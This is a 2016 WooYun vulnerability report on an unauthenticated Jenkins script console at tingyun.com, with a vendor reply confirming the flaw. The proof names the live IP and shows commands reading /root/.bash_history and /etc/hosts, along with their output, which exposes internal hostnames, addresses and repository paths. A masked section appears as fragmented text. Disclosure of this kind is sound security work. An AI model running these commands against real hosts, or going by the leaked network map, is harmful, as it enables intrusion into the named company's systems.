当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182890

漏洞标题:听云某系统未授权访问导致命令执行

相关厂商:tingyun.com

漏洞作者: 路人甲

提交时间:2016-03-10 11:32

修复时间:2016-04-24 11:57

公开时间:2016-04-24 11:57

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-10: 厂商已经确认,细节仅向厂商公开
2016-03-20: 细节向核心白帽子及相关领域专家公开
2016-03-30: 细节向普通白帽子公开
2016-04-09: 细节向实习白帽子公开
2016-04-24: 细节向公众公开

简要描述:

rt

详细说明:

mask 区域
1.https://**.**.**/_
**********
*****45618b87d974f5df4fef.png&qu*****
**********
*****洞^*****
**********
2.https://**.**.**/_
**********
*****^^权^*****
**********
*****2a67c6e3a33bbea8dd5a.png&qu*****
**********
**********
*****^^^*****
3.https://**.**.**/script_
**********
*****ame*****
*****-003.tx.t*****
**********
*****f089517dcfbd7de019f6.png&qu*****
**********
*****bash_h*****
**********
*****7b500141af5e5a4f7cf6.png&qu*****
**********
*****^^*****
*****n.com:netop/tingyun-*****
*****789*****
*****netop/tingyun-com*****
*****789*****
*****com:netop/tingy*****
*****789*****
*****h/known*****
*****789*****
*****com:netop/tingy*****
*****789*****
*****h/known*****
*****789*****
*****l*****
*****789*****
*****com:netop/tingy*****
*****789*****
*****l*****
*****789*****
*****-centos/&*****
**********
*****bffb256da0ba05422413.png&qu*****
**********
*****c/ho*****
**********
*****y-pub-gw-001.*****
*****-gw-002.tx*****
*****jump-001.t*****
*****_db-001.tx.*****
*****ave-001.tx.*****
*****_redis-001.t*****
*****nf_db-001.t*****
**********
*****master-001.*****
*****ster-004.tx.*****
*****ster-005.tx.*****
*****gyun.com tx-ty-k8s-*****
*****gyun.com tx-ty-k8s-*****
***** tx-ty-k8s-etcd-003.tx.*****
*****master-002.*****
*****master-003.*****
*****master-001.*****
**********
*****slave-001.tx*****
*****wser-slave-00*****
*****wser-slave-00*****
*****wser-slave-00*****
*****wser-slave-00*****
*****gconf_db-001.*****
*****r-data-001.*****
*****-trace-001.t*****
**********
***** reg*****
*****try.ting*****
**********
*****ster-001.tx*****
*****node-001.t*****
*****node-002.t*****
**********
*****tingyun.com*****
**********
*****026ce4ab488120fbc74f.png&qu*****
**********
*****fig*****
*****t;UP,BROADCAST,MU*****
*****mask 255.255.0.*****
*****b:e8 txqueuel*****
*****7 bytes 258*****
*****opped 0 ove*****
***** bytes 125407*****
*****overruns 0 carr*****
**********
*****AST,RUNNING,MUL*****
*****255.255.255.0 b*****
*****2d txqueuelen *****
***** bytes 14151845*****
*****opped 0 ove*****
*****3 bytes 22069*****
*****overruns 0 carr*****
**********
*****BACK,RUNNING*****
*****0.1 netma*****
*****len 0 (Loc*****
***** bytes 33921*****
*****opped 0 ove*****
***** bytes 33921*****
*****overruns 0 carr*****
*****de&g*****
**********
*****bb4410c4ebecdd496d023c.png*****

漏洞证明:

https://119.29.69.210/

111.png


存在漏洞地址
https://119.29.69.210/
jenkins未授权访问

111.png


命令执行URL
https://119.29.69.210/script
hostname
tx-ty-mesos-slave-003.tx.tingyun.com

111.png


cat /root/.bash_history

111.png


部分内容

git clone git@gitlab.tingyun.com:netop/tingyun-common-centos.git:10222
#1453789283
git clone git@gitlab.tingyun.com:netop/tingyun-common-centos.git:10022
#1453789836
git clone git@gitlab.tingyun.com:netop/tingyun-common-centos.git
#1453789842
vim /root/.ssh/known_hosts
#1453789847
git clone git@gitlab.tingyun.com:netop/tingyun-common-centos.git
#1453789851
vim /root/.ssh/known_hosts
#1453789855
ll
#1453789857
git clone git@gitlab.tingyun.com:netop/tingyun-common-centos.git
#1453789862
ll
#1453789865
cd tingyun-common-centos/


111.png


cat /etc/hosts

10.8.0.2	tx-ty-pub-gw-001.tx.tingyun.com
10.8.0.3 tx-ty-pub-gw-002.tx.tingyun.com
10.8.0.4 tx-ty-pub-jump-001.tx.tingyun.com
10.8.0.5 tx-ty-pub-cd_db-001.tx.tingyun.com
10.8.0.6 tx-ty-pub-slave-001.tx.tingyun.com
10.8.0.7 tx-ty-pub-conf_redis-001.tx.tingyun.com
10.8.0.8 tx-ty-pub-conf_db-001.tx.tingyun.com
10.8.5.2 tx-ty-mesos-master-001.tx.tingyun.com
10.8.5.3 tx-ty-mesos-master-004.tx.tingyun.com
10.8.5.4 tx-ty-mesos-master-005.tx.tingyun.com
10.8.5.5 tx-ty-mesos-slave-001.tx.tingyun.com tx-ty-k8s-etcd-001.tx.tingyun.com
10.8.5.6 tx-ty-mesos-slave-002.tx.tingyun.com tx-ty-k8s-etcd-002.tx.tingyun.com
10.8.5.7 tx-ty-mesos-slave-003.tx.tingyun.com tx-ty-k8s-etcd-003.tx.tingyun.com #ssh port 1022
10.8.5.8 tx-ty-mesos-master-002.tx.tingyun.com
10.8.5.9 tx-ty-mesos-master-003.tx.tingyun.com
10.8.5.10 tx-ty-salt-master-001.tx.tingyun.com
10.8.3.2 tx-ty-browser-slave-001.tx.tingyun.com
10.8.3.3 tx-ty-browser-slave-002.tx.tingyun.com
10.8.3.4 tx-ty-browser-slave-003.tx.tingyun.com
10.8.3.5 tx-ty-browser-slave-004.tx.tingyun.com
10.8.3.6 tx-ty-browser-slave-005.tx.tingyun.com
10.8.3.7 tx-ty-browser-bigconf_db-001.tx.tingyun.com
10.8.3.8 tx-ty-browser-data-001.tx.tingyun.com
10.8.3.9 tx-ty-browser-trace-001.tx.tingyun.com
#docker registry
#10.8.5.5 registry.tingyun.com
10.8.6.2 tx-ty-k8s-master-001.tx.tingyun.com
10.8.6.3 tx-ty-k8s-node-001.tx.tingyun.com
10.8.6.4 tx-ty-k8s-node-002.tx.tingyun.com
192.168.1.16 package.tingyun.com


111.png


ifconfig -a

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
inet 172.17.42.1 netmask 255.255.0.0 broadcast 0.0.0.0
ether 02:42:0d:cb:0b:e8 txqueuelen 0 (Ethernet)
RX packets 49017 bytes 2584842 (2.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 94935 bytes 125407531 (119.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.8.5.7 netmask 255.255.255.0 broadcast 10.8.5.255
ether 52:54:00:9c:7e:2d txqueuelen 1000 (Ethernet)
RX packets 208807475 bytes 141518454000 (131.7 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 164469893 bytes 22069239753 (20.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 0 (Local Loopback)
RX packets 431834 bytes 339210860 (323.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 431834 bytes 339210860 (323.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


111.png


修复方案:

jenkins 未授权访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-10 11:57

厂商回复:

测试系统。已确认,正在修复。

最新状态:

暂无


漏洞评价:

评价